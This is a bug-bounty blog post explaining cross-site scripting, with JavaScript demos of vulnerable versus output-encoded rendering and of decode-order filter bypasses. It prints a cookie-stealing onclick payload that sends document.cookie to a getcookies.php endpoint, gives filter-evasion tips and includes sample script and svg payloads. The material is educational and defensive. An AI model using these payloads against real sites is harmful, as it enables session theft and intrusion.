Behind the Scene: XSS?
2021-06-13 21:57:03 Author: infosecwriteups.com (view original)

Before we start, let's understand what XSS actually is.

What the hack is XSS (Cross-Site Scripting)?

XSS is a client-side code injection attack. By that I mean: by getting malicious script into a genuine web page, the attacker aims to have that script run in the victim's browser, with the permissions and cookies of the vulnerable site.

I found the image below helpful for understanding the concept. Have a look and try to follow what is actually happening.

Backend process of XSS

Functioning of XSS

Still have doubts? No worries at all, let's take a deeper dive with an example.

Example

1. Let's say you are testing a site, xyz.com, and you find that you can inject your script into some parameter or other vulnerable point.

2. Then you inject your script, let's say "<a onclick="document.location='http://localhost/ethicalkaps/getcookies.php?cookie='+escape(document.cookie);" href="https://ethicalkaps.com">ClickHere</a>". (This steals the cookies from the victim's session, as long as the session cookie is not marked HttpOnly; document.cookie cannot read HttpOnly cookies.)

3. The script is taken in by the web application and ends up in the page's HTML, so the browser treats it as part of the site's own markup.

4. Now, when the victim clicks the link you created (the href is the harmless-looking destination; the onclick handler runs first and sends document.cookie to your getcookies.php), you receive the victim's session cookie.

Simple, right? Yes, indeed it is! But most of the time the developer filters or encodes user input, so we cannot inject our payload directly into the website, and we have to look for ways around the restriction.
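To make the four steps concrete, here is an added example (not code from the original post): a page template that drops an untrusted parameter straight into HTML, the cookie-stealing <a> payload from step 2, the URL that payload would send the victim to, and the same template with HTML output encoding, which is the usual fix. The hostnames and path (localhost/ethicalkaps/getcookies.php, ethicalkaps.com) are the ones the post uses; the "comment" template and the victim's cookie string are constructed for the demo.

```javascript
// Step 2: the payload, written the way a browser needs to see it.
const PAYLOAD =
  '<a onclick="document.location=\'http://localhost/ethicalkaps/getcookies.php?cookie=\'' +
  '+escape(document.cookie);" href="https://ethicalkaps.com">ClickHere</a>';

// Step 3 (vulnerable): the application interpolates the parameter verbatim,
// so the attacker's <a ...> becomes a real element in the page.
function renderCommentUnsafe(comment) {
  return `<div class="comment">${comment}</div>`;
}

// Minimal HTML entity encoding for text placed inside an element body.
function htmlEncode(s) {
  return String(s).replace(/[&<>"']/g, (c) =>
    ({ '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' })[c]);
}

// The fix: encode on output. '<a onclick=...' is shown as text, not parsed as a tag.
function renderCommentSafe(comment) {
  return `<div class="comment">${htmlEncode(comment)}</div>`;
}

// Step 4: what the onclick handler computes when the victim clicks.
// The post uses escape(); it is deprecated, so encodeURIComponent is used
// here (for a cookie string like the one below the result is identical).
function exfilUrl(documentCookie) {
  return 'http://localhost/ethicalkaps/getcookies.php?cookie=' +
    encodeURIComponent(documentCookie);
}

// Did the injection survive? True if the rendered HTML contains any tag
// other than the wrapper <div>.
function hasInjectedTag(html) {
  const body = html.replace(/^<div class="comment">/, '').replace(/<\/div>$/, '');
  return /<[a-z]/i.test(body);
}

// Constructed sample: a victim whose session cookie is readable from script.
const VICTIM_COOKIE = 'session=abc123; theme=dark';

console.log(renderCommentUnsafe(PAYLOAD)); // the <a onclick=...> is live markup
console.log(renderCommentSafe(PAYLOAD));   // the same payload, rendered as text
console.log(exfilUrl(VICTIM_COOKIE));      // what the victim's browser requests
```

Run it with node; the first line of output is the page as the victim's browser would parse it, the second is what the browser shows once the developer encodes on output, and the third is the request that would arrive at getcookies.php.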

A few ways to bypass the restrictions :-

  1. Encode your payload. (For example, < can be URL-encoded as %3C, ? as %3F and a newline as %0A.) Whether this works depends on where the filter sits relative to the decoding step: a check that runs on the raw request sees %3C, not <.
  2. If your payload is reflected on the website but does not execute, view the page source, find where your payload lands (element body, attribute value, script block) and where it gets stuck or encoded, and change the payload to break out of that context.
  3. Sometimes the injection point renders in a page we never see (an admin panel, a log viewer, a support ticket), so don't forget to try BLIND XSS. (I personally use XSS Hunter for that.)
  4. If there is no rate limit on the parameter, you can use Burp Intruder to inject a whole list of payloads.
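Point 1 above is easiest to see by modelling where a filter runs. The following is an added example, not code from the original post: four constructed request handlers take the raw (still URL-encoded) value of a query parameter and return { blocked, html }. The first runs a blocklist before URL decoding, the second after one decode, the third decodes a second time after the check (as happens when a proxy and the application each decode), and the last skips blocklists and HTML-encodes on output. The blocklist, the "search results" template and the sample payloads are invented for the demo.

```javascript
// Naive blocklist: rejects anything that looks like a tag or a javascript: URL.
function looksDangerous(value) {
  return /<|>|javascript:/i.test(value);
}

// Minimal HTML entity encoding for text placed inside an element body.
function htmlEncode(s) {
  return String(s).replace(/[&<>"']/g, (c) =>
    ({ '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' })[c]);
}

// The page that reflects the search term.
function resultsPage(term) {
  return `<p>Results for ${term}</p>`;
}

// 1. Filter checks the raw value; decoding happens afterwards.
//    '%3C' contains no '<', so the check passes and the decode restores the tag.
function filterBeforeDecode(rawParam) {
  if (looksDangerous(rawParam)) return { blocked: true, html: '' };
  return { blocked: false, html: resultsPage(decodeURIComponent(rawParam)) };
}

// 2. Decode once, then filter: single URL encoding no longer helps the attacker.
function decodeThenFilter(rawParam) {
  const once = decodeURIComponent(rawParam);
  if (looksDangerous(once)) return { blocked: true, html: '' };
  return { blocked: false, html: resultsPage(once) };
}

// 3. Decode, filter, then the backend decodes again: double encoding
//    (%253C -> %3C -> <) slips past the check in the middle.
function decodeFilterDecodeAgain(rawParam) {
  const once = decodeURIComponent(rawParam);
  if (looksDangerous(once)) return { blocked: true, html: '' };
  return { blocked: false, html: resultsPage(decodeURIComponent(once)) };
}

// 4. No blocklist at all: decode, then HTML-encode on output.
//    Whatever the attacker sends is rendered as text.
function decodeThenEncodeOutput(rawParam) {
  return { blocked: false, html: resultsPage(htmlEncode(decodeURIComponent(rawParam))) };
}

// Did a real tag make it into the page? The template's own <p> is one tag;
// anything beyond that is injected markup.
function hasInjectedTag(html) {
  return (html.match(/<[a-z]/gi) || []).length > 1;
}

// Constructed payloads (the post's "><svg/onload=alert(1)> idea, URL-encoded).
const SINGLE = '%3Csvg%2Fonload%3Dalert(1)%3E';         // decodes to <svg/onload=alert(1)>
const DOUBLE = '%253Csvg%252Fonload%253Dalert(1)%253E'; // decodes once to SINGLE

for (const [name, handler] of Object.entries({
  filterBeforeDecode, decodeThenFilter, decodeFilterDecodeAgain, decodeThenEncodeOutput,
})) {
  for (const [label, raw] of [['single', SINGLE], ['double', DOUBLE]]) {
    const r = handler(raw);
    console.log(name, label, r.blocked ? 'blocked' : hasInjectedTag(r.html) ? 'INJECTED' : 'rendered as text');
  }
}
```

The loop prints which combination of handler and payload ends with a live <svg> in the page. Only the output-encoding handler is safe against both payloads without caring how many times the input was encoded, which is why "sanitize the input" is a weaker defence than "encode for the output context".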

I personally prefer :-

The reason being that they keep their payload list updated on a regular basis.

These are some things you can't forget to look out for. If you want to learn more about how to bypass such coding restrictions in practice,

Visit :-

for some practical payload material.

So, hackers, now it's time for you to decide: is it really just about finding a "PARAMETER" or "SEARCH" field and running payloads like "><script>alert("Cyberpunks here")</script> or "><svg/onload=alert(1)>, or is there something more to it?

Keep digging and learning new things. I will come back with another #BehindtheScene on some other vulnerability. Till then, take care and keep hunting for good.


If you like the content, you can support me over here :- @buymeacoffee.com/ethicalkaps

See you in the next article. Until then, take care. Peace!

You can follow me on Twitter, on Spotify to listen to my writeups, and on Instagram.


Source: https://infosecwriteups.com/behind-the-scene-xss-6a7ff5559b54?source=rss----7b722bfd1b8d--bug_bounty